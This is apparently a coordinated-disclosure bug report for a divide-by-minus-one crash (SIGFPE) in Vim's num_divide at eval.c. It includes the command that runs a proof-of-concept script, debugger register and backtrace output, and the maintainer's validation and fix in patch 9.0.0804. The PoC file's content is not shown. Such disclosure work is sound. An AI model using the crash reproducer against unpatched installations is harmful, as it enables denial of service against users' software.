Floating point exception in function num_divide at eval in vim/vim


Reported on

Oct 18th 2022

Floating point exception in function num_divide at eval.c:70


vim version

git log -1
commit db4c94788ad70118fa1ccc5fbc821757350ac771 (HEAD -> master, tag: v9.0.0769, origin/master, origin/HEAD)

Proof of Concept

# ./src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Floating point exception

Content of poc_min (base64 encoded):


GDB output:

pwndbg> r -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Starting program: /root/vim/src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGFPE, Arithmetic exception.
0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
70              result = n1 / n2;
───[ REGISTERS / show-flags off / show-compact-regs off ]──
*RAX  0x8000000000000000
*RBX  0x7ffee0e09ca0 ◂— 0x0
*RCX  0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RDX  0xffffffffffffffff
*RDI  0x5610b6a9f760 (__afl_area_ptr) —▸ 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RSI  0x2f
 R8   0x0
*R9   0xfffdc1c136c ◂— 0x0
*R10  0x7ffee0e095a0 ◂— 0x0
*R11  0xffffffffffffffff
*R12  0x7ffee0e09c60 ◂— 0x5
*R13  0x7ffee0e0aa40 ◂— 0x5
*R14  0x7ffee0e0afd0 ◂— 0x1
*R15  0x8000000000000000
*RBP  0x7ffee0e09d90 —▸ 0x7ffee0e0a030 —▸ 0x7ffee0e0a170 —▸ 0x7ffee0e0a2f0 —▸ 0x7ffee0e0a550 ◂— ...
*RSP  0x7ffee0e09c20 ◂— 0x41b58ab3
*RIP  0x5610b5f67cdb (eval7+2587) ◂— idiv   r11
────[ DISASM / x86-64 / set emulate on ]───
 ► 0x5610b5f67cdb <eval7+2587>    idiv   r110x5610b5f67cdb <eval7+2587>    idiv   r11

──────[ SOURCE (CODE) ]───────
In file: /root/vim/src/eval.c
   65       result = -VARNUM_MAX;
   66   else
   67       result = VARNUM_MAX;
   68     }
   69     else
 ► 70   result = n1 / n2;
   72     return result;
   73 }
   75 /*
─────[ STACK ]──────
00:0000rsp 0x7ffee0e09c20 ◂— 0x41b58ab3
01:00080x7ffee0e09c28 —▸ 0x5610b6857698 ◂— '4 32 4 14 getnext.i:2442 48 4 12 getnext:3539 64 16 9 var2:3540 96 4 10 error:3545'
02:00100x7ffee0e09c30 —▸ 0x5610b5f672c0 (eval7) ◂— push   rbp
03:00180x7ffee0e09c38 ◂— 0x0
... ↓        4 skipped
───────[ BACKTRACE ]────
 ► f 0   0x5610b5f67cdb eval7+2587
   f 1   0x5610b5f67cdb eval7+2587
   f 2   0x5610b5f65b0b eval6+299
   f 3   0x5610b5f650b1 eval5+209
   f 4   0x5610b5f644a5 eval4+325
   f 5   0x5610b5f63513 eval3+275
   f 6   0x5610b5f3e02b eval1+395
   f 7   0x5610b5f3e02b eval1+395

pwndbg> bt
#0  0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
#1  eval7 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0, want_string=0) at eval.c:3666
#2  0x00005610b5f65b0b in eval6 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:3309
#3  0x00005610b5f650b1 in eval5 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0xffffffffffffffff) at eval.c:3198
#4  0x00005610b5f644a5 in eval4 (arg=<optimized out>, rettv=<optimized out>, evalarg=<optimized out>) at eval.c:3049
#5  0x00005610b5f63513 in eval3 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2910
#6  0x00005610b5f3e02b in eval2 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2784
#7  eval1 (arg=0x7ffee0e0a920, rettv=<optimized out>, evalarg=0x7ffee0e0afd0) at eval.c:2630
#8  0x00005610b6628019 in get_func_arguments (arg=0x7ffee0e0aa20, evalarg=<optimized out>, partial_argc=<optimized out>, argvars=<optimized out>, argcount=<optimized out>) at userfunc.c:1757
#9  0x00005610b66272cf in get_func_tv (name=<optimized out>, len=<optimized out>, rettv=<optimized out>, arg=<optimized out>, evalarg=<optimized out>, funcexe=<optimized out>) at userfunc.c:1820
#10 0x00005610b664b469 in ex_call_inner (eap=0x7ffee0e0b2e0, name=0x5610b6a9f760 <__afl_area_ptr> " \330H\267\020V", arg=0x5610b748d820 <__afl_area_initial>, startarg=0x7ffee0e095a0 "", evalarg=0x0, funcexe_init=<optimized out>) at userfunc.c:5647
#11 ex_call (eap=0x7ffee0e0b2e0) at userfunc.c:5971
#12 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0b510, flags=7, cstack=0x7ffee0e0b530, fgetline=0x5610b6445a50 <getsourceline>, cookie=0x7ffee0e0c120) at ex_docmd.c:2578
#13 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#14 0x00005610b6443024 in do_source_ext (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>, ret_sid=<optimized out>, eap=<optimized out>, clearvars=<optimized out>) at scriptfile.c:1667
#15 0x00005610b6440c95 in do_source (check_other=0, is_vimrc=0, ret_sid=0x0, fname=<optimized out>) at scriptfile.c:1811
#16 cmd_source (fname=<optimized out>, eap=0x7ffee0e0c460) at scriptfile.c:1163
#17 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0c690, flags=11, cstack=0x7ffee0e0c6b0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2578
#18 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#19 0x00005610b6809f1a in exe_commands (parmp=<optimized out>) at main.c:3135
#20 vim_main2 () at main.c:781
#21 0x00005610b680720c in main (argc=11, argv=0x7ffee0e0f9c8) at main.c:432
#22 0x00007f887ac9cd90 in __libc_start_call_main (main=main@entry=0x5610b6802900 <main>, argc=argc@entry=11, argv=argv@entry=0x7ffee0e0f9c8) at ../sysdeps/nptl/libc_start_call_main.h:58
#23 0x00007f887ac9ce40 in __libc_start_main_impl (main=0x5610b6802900 <main>, argc=11, argv=0x7ffee0e0f9c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffee0e0f9b8) at ../csu/libc-start.c:392
#24 0x00005610b5d2a265 in _start ()


This vulnerability is capable of crashing software.

Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale

We are processing your report and will contact the vim team within 24 hours. a year ago
We have contacted a member of the vim team and are waiting to hear back a year ago
Bram Moolenaar validated this vulnerability a year ago

Interesting corner case.

ex7l0it has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bram Moolenaar
a year ago


Fixed with patch 9.0.0804

Bram Moolenaar marked this as fixed in 9.0.0804 with commit cdef1c a year ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation